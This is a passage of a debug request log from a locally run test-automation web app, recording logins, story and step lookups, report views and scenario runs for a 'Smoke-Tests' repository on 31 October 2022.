10] GET:/reportHistory/6357a20842797f1390c87c74, reqOrigin: ::1, resCode: 200 +2022-10-31T11:01:34.375Z debug: [1667214093957, duration: 412] GET:/report/reporting_1667213902341, reqOrigin: ::1, resCode: 200 +2022-10-31T11:01:39.282Z debug: [1667214099280, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T11:01:39.316Z debug: [1667214099314, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T11:01:47.195Z debug: [1667214107193, duration: 2] GET:/logout, reqOrigin: ::1, resCode: 304 +2022-10-31T11:01:48.489Z debug: [1667214108404, duration: 84] POST:/login, reqOrigin: ::1, resCode: 200 +2022-10-31T11:01:48.530Z debug: [1667214108521, duration: 9] GET:/repositories, reqOrigin: ::1, resCode: 304 +2022-10-31T11:01:48.586Z debug: [1667214108569, duration: 3] GET:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T11:01:48.637Z debug: [1667214108631, duration: 5] GET:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T11:01:48.642Z debug: [1667214108635, duration: 5] GET:/stepTypes, reqOrigin: ::1, resCode: 304 +2022-10-31T11:01:48.680Z debug: [1667214108628, duration: 52] GET:/stories/?repoName=Smoke-Tests&source=db&id=63565da342797f1390c87c65, reqOrigin: ::1, resCode: 200 +2022-10-31T11:01:52.037Z debug: [1667214112033, duration: 4] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T11:01:52.068Z debug: [1667214112063, duration: 4] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T11:01:56.129Z debug: [1667214116127, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T11:01:58.145Z debug: [1667214118137, duration: 8] GET:/reportHistory/6357a1f442797f1390c87c72, reqOrigin: ::1, resCode: 304 +2022-10-31T11:02:03.181Z debug: [1667214123170, duration: 8] GET:/reportHistory/6357a1fc42797f1390c87c73, reqOrigin: ::1, resCode: 304 +2022-10-31T11:02:04.164Z debug: [1667214124161, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T11:02:04.200Z debug: [1667214124198, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T11:04:36.677Z debug: [1667214276675, duration: 1] GET:/logout, reqOrigin: ::1, resCode: 304 +2022-10-31T11:04:38.127Z debug: [1667214278046, duration: 81] POST:/login, reqOrigin: ::1, resCode: 200 +2022-10-31T11:04:38.171Z debug: [1667214278158, duration: 13] GET:/repositories, reqOrigin: ::1, resCode: 304 +2022-10-31T11:04:38.221Z debug: [1667214278217, duration: 3] GET:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T11:04:38.300Z debug: [1667214278296, duration: 3] GET:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T11:04:38.302Z debug: [1667214278298, duration: 4] GET:/stepTypes, reqOrigin: ::1, resCode: 304 +2022-10-31T11:04:38.350Z debug: [1667214278293, duration: 56] GET:/stories/?repoName=Smoke-Tests&source=db&id=63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T11:04:40.481Z debug: [1667214280479, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T11:04:40.513Z debug: [1667214280510, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T11:12:17.340Z debug: [1667214737336, duration: 4] GET:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 200 +2022-10-31T11:12:17.369Z debug: [1667214737362, duration: 6] GET:/stepTypes, reqOrigin: ::1, resCode: 200 +2022-10-31T11:12:17.406Z debug: [1667214737378, duration: 28] GET:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 200 +2022-10-31T11:12:17.416Z debug: [1667214737381, duration: 34] GET:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 200 +2022-10-31T11:12:17.443Z debug: [1667214737428, duration: 14] GET:/stepTypes, reqOrigin: ::1, resCode: 200 +2022-10-31T11:12:17.481Z debug: [1667214737359, duration: 121] GET:/stories/?repoName=Smoke-Tests&source=db&id=63565da342797f1390c87c65, reqOrigin: ::1, resCode: 200 +2022-10-31T11:12:17.509Z debug: [1667214737403, duration: 105] GET:/stories/?repoName=Smoke-Tests&source=db&id=63565da342797f1390c87c65, reqOrigin: ::1, resCode: 200 +2022-10-31T11:12:20.078Z debug: [1667214740075, duration: 3] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T11:12:20.107Z debug: [1667214740105, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T11:12:24.348Z debug: [1667214744340, duration: 8] GET:/reportHistory/6357a1fc42797f1390c87c73, reqOrigin: ::1, resCode: 200 +2022-10-31T11:12:26.613Z debug: [1667214746278, duration: 335] GET:/report/reporting_1667214287243, reqOrigin: ::1, resCode: 200 +2022-10-31T11:13:31.260Z debug: [1667214811258, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T11:13:31.296Z debug: [1667214811290, duration: 6] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T11:22:46.223Z debug: [1667215366220, duration: 2] GET:/logout, reqOrigin: ::1, resCode: 304 +2022-10-31T11:26:13.081Z debug: [1667215572986, duration: 95] POST:/login, reqOrigin: ::1, resCode: 200 +2022-10-31T11:26:13.127Z debug: [1667215573117, duration: 10] GET:/repositories, reqOrigin: ::1, resCode: 304 +2022-10-31T11:26:13.169Z debug: [1667215573166, duration: 2] GET:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T11:26:13.294Z debug: [1667215573290, duration: 4] GET:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T11:26:13.297Z debug: [1667215573293, duration: 3] GET:/stepTypes, reqOrigin: ::1, resCode: 304 +2022-10-31T11:26:13.333Z debug: [1667215573287, duration: 45] GET:/stories/?repoName=Smoke-Tests&source=db&id=63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T11:26:15.993Z debug: [1667215575991, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T11:26:16.028Z debug: [1667215576022, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T11:26:16.912Z debug: [1667215576904, duration: 8] GET:/reportHistory/6357a20842797f1390c87c74, reqOrigin: ::1, resCode: 304 +2022-10-31T11:26:24.119Z debug: [1667215584117, duration: 1] GET:/logout, reqOrigin: ::1, resCode: 304 +2022-10-31T11:26:25.499Z debug: [1667215585414, duration: 84] POST:/login, reqOrigin: ::1, resCode: 200 +2022-10-31T11:26:25.555Z debug: [1667215585537, duration: 18] GET:/repositories, reqOrigin: ::1, resCode: 304 +2022-10-31T11:26:25.600Z debug: [1667215585594, duration: 3] GET:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T11:26:25.664Z debug: [1667215585660, duration: 3] GET:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T11:26:25.666Z debug: [1667215585661, duration: 5] GET:/stepTypes, reqOrigin: ::1, resCode: 304 +2022-10-31T11:26:25.713Z debug: [1667215585656, duration: 56] GET:/stories/?repoName=Smoke-Tests&source=db&id=63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T11:26:27.781Z debug: [1667215587778, duration: 3] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T11:26:27.813Z debug: [1667215587811, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T11:31:46.683Z debug: [1667215906682, duration: 1] GET:/logout, reqOrigin: ::1, resCode: 304 +2022-10-31T11:31:51.127Z debug: [1667215911096, duration: 31] POST:/6357a21542797f1390c87c75/db, reqOrigin: ::1, resCode: 200 +2022-10-31T11:36:17.190Z debug: [1667216177091, duration: 95] POST:/login, reqOrigin: ::1, resCode: 200 +2022-10-31T11:36:17.240Z debug: [1667216177224, duration: 15] GET:/repositories, reqOrigin: ::1, resCode: 304 +2022-10-31T11:36:17.285Z debug: [1667216177280, duration: 4] GET:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T11:36:17.397Z debug: [1667216177380, duration: 17] GET:/stepTypes, reqOrigin: ::1, resCode: 304 +2022-10-31T11:36:17.413Z debug: [1667216177387, duration: 25] GET:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T11:36:17.466Z debug: [1667216177376, duration: 90] GET:/stories/?repoName=Smoke-Tests&source=db&id=63565da342797f1390c87c65, reqOrigin: ::1, resCode: 200 +2022-10-31T11:36:20.846Z debug: [1667216180842, duration: 4] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T11:36:20.877Z debug: [1667216180873, duration: 4] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T11:41:40.354Z debug: [1667216500349, duration: 4] GET:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T11:41:40.403Z debug: [1667216500393, duration: 10] GET:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T11:41:40.415Z debug: [1667216500400, duration: 7] GET:/stepTypes, reqOrigin: ::1, resCode: 304 +2022-10-31T11:41:40.440Z debug: [1667216500433, duration: 6] GET:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T11:41:40.467Z debug: [1667216500385, duration: 81] GET:/stories/?repoName=Smoke-Tests&source=db&id=63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T11:41:40.472Z debug: [1667216500468, duration: 3] GET:/stepTypes, reqOrigin: ::1, resCode: 304 +2022-10-31T11:41:40.548Z debug: [1667216500493, duration: 50] GET:/stories/?repoName=Smoke-Tests&source=db&id=63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T11:41:44.995Z debug: [1667216504993, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T11:41:45.032Z debug: [1667216505028, duration: 4] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T11:41:47.768Z debug: [1667216507749, duration: 10] GET:/reportHistory/6357a20842797f1390c87c74, reqOrigin: ::1, resCode: 200 +2022-10-31T11:41:51.119Z debug: [1667216510930, duration: 188] GET:/report/reporting_1667216184024, reqOrigin: ::1, resCode: 200 +2022-10-31T11:42:15.259Z debug: [1667216535258, duration: 1] GET:/stories/?repoName=Smoke-Tests&source=db&id=63565da342797f1390c87c65, reqOrigin: ::1, resCode: 401 +2022-10-31T11:42:15.264Z debug: [1667216535260, duration: 3] GET:/stepTypes, reqOrigin: ::1, resCode: 304 +2022-10-31T11:42:15.321Z debug: [1667216535319, duration: 0] GET:/stories/?repoName=Smoke-Tests&source=db&id=63565da342797f1390c87c65, reqOrigin: ::1, resCode: 401 +2022-10-31T11:42:15.323Z debug: [1667216535317, duration: 5] GET:/stepTypes, reqOrigin: ::1, resCode: 304 +2022-10-31T11:42:19.270Z debug: [1667216539268, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T11:42:19.297Z debug: [1667216539295, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T11:42:21.676Z debug: [1667216541672, duration: 3] GET:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 200 +2022-10-31T11:42:21.766Z debug: [1667216541763, duration: 2] GET:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 200 +2022-10-31T11:42:21.773Z debug: [1667216541767, duration: 5] GET:/stepTypes, reqOrigin: ::1, resCode: 200 +2022-10-31T11:42:21.822Z debug: [1667216541808, duration: 13] GET:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 200 +2022-10-31T11:42:21.822Z debug: [1667216541809, duration: 13] GET:/stepTypes, reqOrigin: ::1, resCode: 200 +2022-10-31T11:42:21.845Z debug: [1667216541760, duration: 85] GET:/stories/?repoName=Smoke-Tests&source=db&id=63565da342797f1390c87c65, reqOrigin: ::1, resCode: 200 +2022-10-31T11:42:21.884Z debug: [1667216541807, duration: 76] GET:/stories/?repoName=Smoke-Tests&source=db&id=63565da342797f1390c87c65, reqOrigin: ::1, resCode: 200 +2022-10-31T11:42:23.235Z debug: [1667216543232, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T11:42:23.267Z debug: [1667216543265, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T11:42:24.650Z debug: [1667216544647, duration: 3] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T11:42:30.084Z debug: [1667216550081, duration: 2] GET:/logout, reqOrigin: ::1, resCode: 200 +2022-10-31T11:42:30.699Z debug: [1667216550691, duration: 8] POST:/background/update/6357a20842797f1390c87c74/db, reqOrigin: ::1, resCode: 200 +2022-10-31T11:42:36.873Z debug: [1667216556790, duration: 83] POST:/login, reqOrigin: ::1, resCode: 200 +2022-10-31T11:42:36.902Z debug: [1667216556893, duration: 8] GET:/repositories, reqOrigin: ::1, resCode: 304 +2022-10-31T11:42:36.966Z debug: [1667216556963, duration: 3] GET:/stepTypes, reqOrigin: ::1, resCode: 304 +2022-10-31T11:42:37.010Z debug: [1667216556962, duration: 48] GET:/stories/?repoName=Smoke-Tests&source=db&id=63565da342797f1390c87c65, reqOrigin: ::1, resCode: 200 +2022-10-31T11:42:38.829Z debug: [1667216558827, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T11:42:38.906Z debug: [1667216558904, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T11:42:56.932Z debug: [1667216576928, duration: 3] GET:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 200 +2022-10-31T11:42:56.975Z debug: [1667216576972, duration: 3] GET:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 200 +2022-10-31T11:43:51.208Z debug: [1667216631185, duration: 22] PUT:/6357a21542797f1390c87c75/db/15, reqOrigin: ::1, resCode: 200 +2022-10-31T11:45:15.522Z debug: [1667216715518, duration: 4] GET:/api/run/Feature/6357a20842797f1390c87c74/db, reqOrigin: ::1, resCode: 404 +2022-10-31T11:45:28.387Z debug: [1667216728376, duration: 11] GET:/reportHistory/6357a20842797f1390c87c74, reqOrigin: ::1, resCode: 304 +2022-10-31T11:45:32.475Z debug: [1667216732473, duration: 2] GET:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T11:45:32.587Z debug: [1667216732571, duration: 15] GET:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T11:45:32.587Z debug: [1667216732575, duration: 12] GET:/stepTypes, reqOrigin: ::1, resCode: 304 +2022-10-31T11:45:32.638Z debug: [1667216732568, duration: 70] GET:/stories/?repoName=Smoke-Tests&source=db&id=63565da342797f1390c87c65, reqOrigin: ::1, resCode: 200 +2022-10-31T11:45:32.639Z debug: [1667216732621, duration: 18] GET:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T11:45:32.642Z debug: [1667216732622, duration: 19] GET:/stepTypes, reqOrigin: ::1, resCode: 304 +2022-10-31T11:45:32.715Z debug: [1667216732669, duration: 45] GET:/stories/?repoName=Smoke-Tests&source=db&id=63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T11:45:35.712Z debug: [1667216735710, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T11:45:35.746Z debug: [1667216735744, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T11:45:37.625Z debug: [1667216737616, duration: 9] GET:/reportHistory/6357a20842797f1390c87c74, reqOrigin: ::1, resCode: 304 +2022-10-31T11:45:50.194Z debug: [1667216750190, duration: 3] GET:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T11:45:50.292Z debug: [1667216750286, duration: 6] GET:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T11:45:50.304Z debug: [1667216750294, duration: 9] GET:/stepTypes, reqOrigin: ::1, resCode: 304 +2022-10-31T11:45:50.326Z debug: [1667216750321, duration: 5] GET:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T11:45:50.347Z debug: [1667216750280, duration: 66] GET:/stories/?repoName=Smoke-Tests&source=db&id=63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T11:45:50.348Z debug: [1667216750335, duration: 13] GET:/stepTypes, reqOrigin: ::1, resCode: 304 +2022-10-31T11:45:50.411Z debug: [1667216750372, duration: 38] GET:/stories/?repoName=Smoke-Tests&source=db&id=63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T11:45:52.048Z debug: [1667216752045, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T11:45:52.078Z debug: [1667216752075, duration: 3] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T11:45:57.949Z debug: [1667216757937, duration: 11] GET:/reportHistory/6357a20842797f1390c87c74, reqOrigin: ::1, resCode: 200 +2022-10-31T11:46:00.090Z debug: [1667216759814, duration: 276] GET:/report/reporting_1667216554417, reqOrigin: ::1, resCode: 200 +2022-10-31T11:46:41.924Z debug: [1667216801894, duration: 26] PUT:/6357a21542797f1390c87c75/db/15, reqOrigin: ::1, resCode: 200 +2022-10-31T11:47:02.969Z debug: [1667216822923, duration: 46] POST:/6357a21542797f1390c87c75/db, reqOrigin: ::1, resCode: 200 +2022-10-31T11:50:17.774Z debug: [1667217017756, duration: 18] PUT:/6357a21542797f1390c87c75/db/16, reqOrigin: ::1, resCode: 200 +2022-10-31T11:50:50.300Z debug: [1667217050296, duration: 4] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T11:50:50.332Z debug: [1667217050330, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T11:50:52.881Z debug: [1667217052877, duration: 4] GET:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 200 +2022-10-31T11:50:52.984Z debug: [1667217052974, duration: 10] GET:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 200 +2022-10-31T11:50:52.986Z debug: [1667217052976, duration: 9] GET:/stepTypes, reqOrigin: ::1, resCode: 200 +2022-10-31T11:50:53.017Z debug: [1667217052994, duration: 23] GET:/stepTypes, reqOrigin: ::1, resCode: 200 +2022-10-31T11:50:53.025Z debug: [1667217053012, duration: 13] GET:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 200 +2022-10-31T11:50:53.070Z debug: [1667217052968, duration: 101] GET:/stories/?repoName=Smoke-Tests&source=db&id=63565da342797f1390c87c65, reqOrigin: ::1, resCode: 200 +2022-10-31T11:50:53.095Z debug: [1667217052993, duration: 101] GET:/stories/?repoName=Smoke-Tests&source=db&id=63565da342797f1390c87c65, reqOrigin: ::1, resCode: 200 +2022-10-31T11:50:57.708Z debug: [1667217057706, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T11:50:57.757Z debug: [1667217057743, duration: 3] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T11:51:16.432Z debug: [1667217060429, duration: 16003] POST:/Scenario/6357a20842797f1390c87c74/db/1, reqOrigin: ::1, resCode: 200 +2022-10-31T11:51:16.501Z debug: [1667217076497, duration: 4] GET:/report/635fb6b4f9aefc14c8e30e67, reqOrigin: ::1, resCode: 200 +2022-10-31T11:54:25.280Z debug: [1667217265262, duration: 17] PUT:/6357a21542797f1390c87c75/db/16, reqOrigin: ::1, resCode: 200 +2022-10-31T11:55:27.931Z debug: [1667217327888, duration: 43] POST:/6357a21542797f1390c87c75/db, reqOrigin: ::1, resCode: 200 +2022-10-31T11:56:06.518Z debug: [1667217366498, duration: 19] PUT:/6357a21542797f1390c87c75/db/17, reqOrigin: ::1, resCode: 200 +2022-10-31T11:56:53.563Z debug: [1667217413543, duration: 20] PUT:/6357a21542797f1390c87c75/db/17, reqOrigin: ::1, resCode: 200 +2022-10-31T11:57:00.691Z debug: [1667217420674, duration: 17] PUT:/6357a21542797f1390c87c75/db/17, reqOrigin: ::1, resCode: 200 +2022-10-31T11:57:06.745Z debug: [1667217426741, duration: 3] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T11:57:06.765Z debug: [1667217426762, duration: 3] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T11:57:14.931Z debug: [1667217434929, duration: 2] GET:/logout, reqOrigin: ::1, resCode: 304 +2022-10-31T11:57:22.270Z debug: [1667217442189, duration: 81] POST:/login, reqOrigin: ::1, resCode: 200 +2022-10-31T11:57:22.300Z debug: [1667217442291, duration: 8] GET:/repositories, reqOrigin: ::1, resCode: 304 +2022-10-31T11:57:22.332Z debug: [1667217442329, duration: 2] GET:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T11:57:22.383Z debug: [1667217442376, duration: 7] GET:/stepTypes, reqOrigin: ::1, resCode: 304 +2022-10-31T11:57:22.384Z debug: [1667217442378, duration: 5] GET:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T11:57:22.429Z debug: [1667217442380, duration: 48] GET:/stories/?repoName=Smoke-Tests&source=db&id=63565da342797f1390c87c65, reqOrigin: ::1, resCode: 200 +2022-10-31T11:57:25.854Z debug: [1667217445851, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T11:57:25.871Z debug: [1667217445868, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T11:57:30.998Z debug: [1667217450994, duration: 4] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T11:57:31.016Z debug: [1667217451013, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T11:57:31.147Z debug: [1667217451133, duration: 14] GET:/reportHistory/6357a20842797f1390c87c74, reqOrigin: ::1, resCode: 200 +2022-10-31T11:57:33.140Z debug: [1667217452839, duration: 300] GET:/report/reporting_1667217098929, reqOrigin: ::1, resCode: 200 +2022-10-31T11:57:35.463Z debug: [1667217455461, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T11:57:49.559Z debug: [1667217469548, duration: 10] GET:/reportHistory/6357a20842797f1390c87c74, reqOrigin: ::1, resCode: 200 +2022-10-31T11:58:08.783Z debug: [1667217465576, duration: 23207] POST:/Scenario/6357a20842797f1390c87c74/db/3, reqOrigin: ::1, resCode: 200 +2022-10-31T11:58:08.845Z debug: [1667217488842, duration: 3] GET:/report/635fb850f9aefc14c8e30e6b, reqOrigin: ::1, resCode: 200 +2022-10-31T11:58:14.923Z debug: [1667217494919, duration: 3] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T11:58:14.954Z debug: [1667217494951, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T11:58:16.219Z debug: [1667217496216, duration: 2] GET:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T11:58:16.322Z debug: [1667217496316, duration: 6] GET:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T11:58:16.328Z debug: [1667217496317, duration: 11] GET:/stepTypes, reqOrigin: ::1, resCode: 304 +2022-10-31T11:58:16.381Z debug: [1667217496357, duration: 23] GET:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T11:58:16.382Z debug: [1667217496307, duration: 74] GET:/stories/?repoName=Smoke-Tests&source=db&id=63565da342797f1390c87c65, reqOrigin: ::1, resCode: 200 +2022-10-31T11:58:16.386Z debug: [1667217496383, duration: 3] GET:/stepTypes, reqOrigin: ::1, resCode: 304 +2022-10-31T11:58:16.450Z debug: [1667217496411, duration: 38] GET:/stories/?repoName=Smoke-Tests&source=db&id=63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T11:58:20.247Z debug: [1667217500244, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T11:58:20.309Z debug: [1667217500306, duration: 3] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T11:58:26.983Z debug: [1667217506971, duration: 10] PUT:/6357a20842797f1390c87c74/db/1, reqOrigin: ::1, resCode: 200 +2022-10-31T11:58:30.628Z debug: [1667217510625, duration: 3] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T12:05:35.079Z debug: [1667217935058, duration: 21] PUT:/6357a21542797f1390c87c75/db/17, reqOrigin: ::1, resCode: 200 +2022-10-31T12:05:47.820Z debug: [1667217947806, duration: 11] PUT:/6357a20842797f1390c87c74/db/3, reqOrigin: ::1, resCode: 200 +2022-10-31T12:05:49.823Z debug: [1667217949811, duration: 12] GET:/reportHistory/6357a20842797f1390c87c74, reqOrigin: ::1, resCode: 200 +2022-10-31T12:05:51.911Z debug: [1667217951908, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T12:05:51.934Z debug: [1667217951931, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T12:06:25.233Z debug: [1667217954157, duration: 31076] POST:/Scenario/6357a20842797f1390c87c74/db/3, reqOrigin: ::1, resCode: 200 +2022-10-31T12:06:25.324Z debug: [1667217985321, duration: 2] GET:/report/635fba41f9aefc14c8e30e6f, reqOrigin: ::1, resCode: 200 +2022-10-31T12:06:55.750Z debug: [1667218015739, duration: 11] GET:/reportHistory/6357a20842797f1390c87c74, reqOrigin: ::1, resCode: 200 +2022-10-31T12:07:02.653Z debug: [1667218022650, duration: 3] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T12:07:02.685Z debug: [1667218022681, duration: 3] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T12:07:08.362Z debug: [1667218028328, duration: 33] POST:/6357a21542797f1390c87c75/db, reqOrigin: ::1, resCode: 200 +2022-10-31T12:07:35.939Z debug: [1667218030954, duration: 24985] POST:/Scenario/6357a20842797f1390c87c74/db/4, reqOrigin: ::1, resCode: 200 +2022-10-31T12:07:36.009Z debug: [1667218056007, duration: 2] GET:/report/635fba87f9aefc14c8e30e71, reqOrigin: ::1, resCode: 200 +2022-10-31T12:07:52.981Z debug: [1667218072976, duration: 5] POST:/background/update/6357a20842797f1390c87c74/db, reqOrigin: ::1, resCode: 200 +2022-10-31T12:07:53.035Z debug: [1667218073026, duration: 9] PUT:/6357a20842797f1390c87c74/db/5, reqOrigin: ::1, resCode: 200 +2022-10-31T12:08:23.303Z debug: [1667218073070, duration: 30232] POST:/Scenario/6357a20842797f1390c87c74/db/5, reqOrigin: ::1, resCode: 200 +2022-10-31T12:08:23.377Z debug: [1667218103375, duration: 2] GET:/report/635fbab7f9aefc14c8e30e73, reqOrigin: ::1, resCode: 200 +2022-10-31T12:08:58.147Z debug: [1667218121554, duration: 16592] POST:/Scenario/6357a20842797f1390c87c74/db/6, reqOrigin: ::1, resCode: 200 +2022-10-31T12:08:58.208Z debug: [1667218138205, duration: 2] GET:/report/635fbadaf9aefc14c8e30e75, reqOrigin: ::1, resCode: 200 +2022-10-31T12:09:24.964Z debug: [1667218164951, duration: 12] PUT:/6357a20842797f1390c87c74/db/6, reqOrigin: ::1, resCode: 200 +2022-10-31T12:09:32.178Z debug: [1667218172168, duration: 8] PUT:/6357a20842797f1390c87c74/db/7, reqOrigin: ::1, resCode: 200 +2022-10-31T12:09:43.645Z debug: [1667218183633, duration: 11] PUT:/6357a20842797f1390c87c74/db/8, reqOrigin: ::1, resCode: 200 +2022-10-31T12:10:20.961Z debug: [1667218193925, duration: 27035] POST:/Scenario/6357a20842797f1390c87c74/db/6, reqOrigin: ::1, resCode: 200 +2022-10-31T12:10:21.022Z debug: [1667218221019, duration: 3] GET:/report/635fbb2cf9aefc14c8e30e77, reqOrigin: ::1, resCode: 200 +2022-10-31T12:11:03.680Z debug: [1667218263661, duration: 18] PUT:/6357a21542797f1390c87c75/db/18, reqOrigin: ::1, resCode: 200 +2022-10-31T12:11:34.017Z debug: [1667218266314, duration: 27703] POST:/Scenario/6357a21542797f1390c87c75/db/18, reqOrigin: 